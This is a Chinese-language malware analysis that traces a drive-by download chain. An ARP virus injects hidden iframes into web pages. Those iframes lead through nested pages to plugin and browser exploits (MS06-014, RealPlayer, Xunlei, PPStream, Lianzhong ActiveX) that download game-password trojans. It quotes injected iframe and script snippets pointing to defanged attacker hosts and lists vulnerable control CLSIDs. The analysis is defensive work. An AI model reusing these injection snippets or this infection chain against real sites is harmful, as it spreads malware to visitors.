ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等

该病毒会向所网页加入代码：

/---

＜iframe src=hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM width=0 height=0＞＜/iframe＞

---/

1 hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM

包含代码：

/---

＜iframe src=hxxp://www.i**mm**m*qm.***.cn/h.htm width=0 height=0＞＜/iframe＞

＜iframe src=hxxp://d*m*.1**7ti**ng**gIeba*.cn/c2.htm width=0 height=0＞＜/iframe＞

＜iframe src=hxxp://a**d*.1**02**4.mo*.cn/10wip.htm＞＜/iframe＞

---/

1.1 hxxp://www.i**mm**m*qm.***.cn/h.htm 包含代码：

/---

＜iframe src=hxxp://0**867*5.se*r**vice-google.***.cn/vip/Cn3100.htm?bb?6 width=0 height=0＞＜/iframe＞

---/

1.1.1 hxxp://0**867*5.se*r**vice-google.***.cn/vip/Cn3100.htm?bb?6 包含并输出代码：

/---

＜iframe src=wm2/index.html width=1 height=1 border=1＞＜/iframe＞

＜iframe style=display:none src="2.gif"＞＜/iframe＞

＜iframe style=display:none src="8.gif"＞＜/iframe＞

＜iframe style=display:none src="1.gif"＞＜/iframe＞

＜iframe style=display:none src="5.gif"＞＜/iframe＞

＜iframe style=display:none src="11.gif"＞＜/iframe＞

＜iframe style=display:none src="4.gif"＞＜/iframe＞

＜iframe style=display:none src="12.gif" width=100 height=1＞＜/iframe＞

＜iframe style=display:none src="2.gif"＞＜/iframe＞

---/

1.1.1.1.1 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/1.gif

.1.1.1.2 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/2.gif

利用ms0614漏洞 下载 hxxp://20**08*02*21.se*r**vice-google.***.cn/614.exe

614.exe 与 bf.exe 相同。

1.1.1.1.3 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/3.gif

利用 Qvod Player插件 漏洞下载 hxxp://20**08*02*03.se*r**vice-google.***.cn/qvod.exe

qvod.exe与bf.exe相同

1.1.1.1.4 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/4.gif

利用BaiduBar.Tool 下载 hxxp://20**08*02*21.se*r**vice-google.***.cn/x.cab

x.cab中的 x.exe 与 bf.exe相同。

1.1.1.1.5 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/5.gif

利用ppstream漏洞下载 hxxp://20**08*02*03.se*r**vice-google.***.cn/pps.exe

pps.exe与 bf.exe相同。

1.1.1.1.6 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/6.gif 包含代码：

/---

＜iframe src=hxxp://20**08*02*21.se*r**vice-google.***.cn/vip/ok_ok.htm width=0 height=0 border=0＞＜/iframe＞

---/

1.1.1.1.6.1 hxxp://20**08*02*21.se*r**vice-google.***.cn/vip/ok_ok.htm 包含代码：

/---

＜iframe src=wm2/z.html width=1 height=1 border=0＞＜/iframe＞

---/

1.1.1.1.6.1.1 hxxp://20**08*02*21.se*r**vice-google.***.cn/vip/wm2/z.html

内容同 1.1.1

1.1.1.1.7 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/7.gif

同6.gif

1.1.1.1.8 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/8.gif

利用realplayer漏洞下载hxxp://20**08*02*03.se*r**vice-google.***.cn/real.exe

real.exe 与 6.gif 相同。

1.1.1.1.9 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/9.gif

同6.gif

1.1.1.1.10 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/10.gif

同6.gif

1.1.1.1.11 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/11.gif

利用联众世界GLChat.ocx 漏洞下载 hxxp://20**08*02*03.se*r**vice-google.***.cn/lz3.exe

lz3.exe 与 bf.exe相同。

1.1.1.1.12 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/12.gif

利用迅雷漏洞下载hxxp://20**08*02*24.se*r**vice-google.***.cn/xl.exe

xl.exe 与 bf.exe相同。

1.1.1.1.13 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/13.gif

同6.gif

1.2 hxxp://d*m*.1**7ti**ng**gIeba*.cn/c2.htm 包含代码：

/---

＜iframe src=hxxp://vvv.m**p1**15**67.com/web/6664301.htm?id=xsl width=100 height=0＞＜/iframe＞

---/

1.2.1 hxxp://vvv.m**p1**15**67.com/web/6664301.htm?id=xsl 包含代码：

/---

＜iframe src=htm.html width=100 height=0＞＜/iframe＞

---/

1.2.1.1 hxxp://vvv.m**p1**15**67.com/web/htm.html 包含并输出代码：

/---

＜iframe width=100 height=0 src=hxxp://vvv.m**p1**15**67.com/web/rl.htm＞＜/iframe＞

＜script src=hxxp://vvv.m**p1**15**67.com/web/1.js＞＜/script＞

＜script src=hxxp://vvv.m**p1**15**67.com/web/bf.js＞＜/script＞

＜script src=hxxp://vvv.m**p1**15**67.com/web/pps.js＞＜/script＞

＜iframe width='10'height='10'src='hxxp://vvv.m**p1**15**67.com/web/3.htm'＞＜/iframe＞

---/

1.2.1.1.1 hxxp://vvv.m**p1**15**67.com/web/rl.htm

1.2.1.1.2 hxxp://vvv.m**p1**15**67.com/web/1.js

利用 MS0614漏洞下载 hxxp://exe.x*in**nia*nk*l.com/014.exe

014.exe 与 rl.exe相同。

1.2.1.1.3 hxxp://vvv.m**p1**15**67.com/web/bf.js

利用暴风影音漏洞下载hxxp://exe.x*in**nia*nk*l.com/bf.exe

bf.exe 与 rl.exe相同。

1.2.1.1.4 hxxp://vvv.m**p1**15**67.com/web/pps.js

利用pps漏洞下载hxxp://exe.x*in**nia*nk*l.com/pps.exe

pps.exe 与 rl.exe相同。

1.2.1.1.5 利用 BaiduBar.Tool 下载 hxxp://exe.x*in**nia*nk*l.com/ad.cab

ad.cab 包含的 bd.exe 与 rl.exe相同。

1.2.1.1.6 hxxp://vvv.m**p1**15**67.com/web/3.htm

利用联众世界的游戏大厅主程序GLWorld的ActiveX控件（HanGamePluginCn18.dll，CLSID：61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载hxxp://exe.x*in**nia*nk*l.com/lz.exe

lz.exe 与 rl.exe相同。

1.3 hxxp://a**d*.1**02**4.mo*.cn/10wip.htm 包含代码：

/---

＜iframe src="hxxp://www.**5**9*.vc/page/add_753643.htm?111222222" width=0 height=0＞＜/iframe＞

---/

1.3.1 hxxp://www.**5**9*.vc/page/add_753643.htm?111222222 包含代码：

/---

＜script src=addr.js＞＜/script＞

---/

1.3.1.1 hxxp://www.**5**9*.vc/page/addr.js

其中的代码比较独特，会检测浏览者的电脑中是否安装有Kaspersky InternetSecurity6.0。

输出代码：

/---

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/baidu.gif"＞＜/iframe＞

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/bf.gif"＞＜/iframe＞

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/ms.gif"＞＜/iframe＞

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/real.gif"＞＜/iframe＞

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/lz.gif"＞＜/iframe＞

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/xl.gif"＞＜/iframe＞

＜iframe style=display:none src="hxxp://***.w**1*8***.vg/ms.gif"＞＜/iframe＞

---/

1.3.1.1.1 hxxp://***.w**1*8***.vg/baidu.gif

利用 BaiduBar.Tool.1 下载 hxxp://***.w**1*8***.vg/calc.cab

calc.cab 包含 s.exe

.3.1.1.2 hxxp://***.w**1*8***.vg/bf.gif

文件不存在

1.3.1.1.3 hxxp://***.w**1*8***.vg/ms.gif

利用MS 0614漏洞 下载 hxxp://***.w**1*8***.vg/s.exe

1.3.1.1.4 hxxp://***.w**1*8***.vg/real.gif

利用RealPlayer漏洞 下载 hxxp://***.w**1*8***.vg/s.exe

1.3.1.1.5 hxxp://***.w**1*8***.vg/lz.gif

利用联众世界GLChat.ocx(clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69,_licensed_to_="huyufeng";)漏洞下载：hxxp://***.w**1*8***.vg/s.exe

1.3.1.1.6 hxxp://***.w**1*8***.vg/xl.gif

利用迅雷看看(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F,_licensed_to_="huyufeng";)漏洞下载：hxxp://***.w**1*8***.vg/s.exe